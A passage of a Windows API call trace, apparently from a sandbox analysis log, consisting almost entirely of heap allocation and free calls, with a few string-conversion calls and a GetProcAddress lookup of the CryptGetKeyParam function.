lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0181.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0181.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0181.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28a8 [0181.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0181.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0181.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0181.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0181.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd828 [0181.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0181.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0181.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0181.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0181.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0181.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0181.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0181.864] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0181.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0181.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0181.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0181.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0181.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0181.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0181.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0181.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0181.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0181.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0181.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0181.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0181.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0181.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0181.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0181.865] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0181.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0181.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0181.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0181.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0181.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0181.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0181.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0181.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0181.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0181.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0181.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0181.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0181.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0181.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0181.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0181.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0181.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0181.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0181.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0181.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0181.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0181.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0181.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0181.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0181.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0181.866] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0181.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0181.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0181.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0181.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0181.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0181.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0181.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0181.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0181.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0181.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0181.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0181.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0181.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0181.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0181.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0181.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0181.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0181.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0181.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0181.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0181.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0181.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0181.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0181.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0181.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0181.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0181.867] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0181.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0181.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0181.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0181.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0181.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0181.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0181.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0181.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0181.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0181.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0181.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0181.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0181.867] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0181.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0181.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd420 [0181.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0181.868] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0181.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0181.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0181.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0181.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0181.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0181.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0181.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0181.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0181.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0181.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0181.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0181.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0181.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0181.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0181.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0181.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0181.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0181.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0181.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0181.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0181.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0181.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0181.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0181.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0181.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0181.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0181.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0181.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0181.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0181.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0181.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0181.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0181.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0181.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0181.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0181.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0181.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0181.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0181.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0181.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0181.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0181.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0181.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0181.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0181.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0181.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0181.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0181.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0181.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0181.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0181.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0181.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0181.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0181.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0181.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0181.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0181.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0181.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0181.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0181.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0181.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0181.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0181.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0181.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0181.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0181.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0181.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0181.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0181.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0181.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0181.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0181.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0181.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0181.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0181.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0181.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0181.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0181.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0181.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0181.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0181.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0181.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0181.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0181.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0181.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0181.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0181.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0181.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0181.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0181.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0181.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0181.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0181.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0181.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0181.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0181.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0181.872] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0181.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0181.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0181.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0181.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0181.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0181.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0181.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0181.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0181.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0181.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0181.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0181.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0181.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0181.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0181.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0181.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0181.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0181.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0181.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0181.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0181.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d440, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0181.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0181.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0181.874] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0181.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0181.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0181.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0181.874] HeapFree (in: hHeap=0x8a0000, 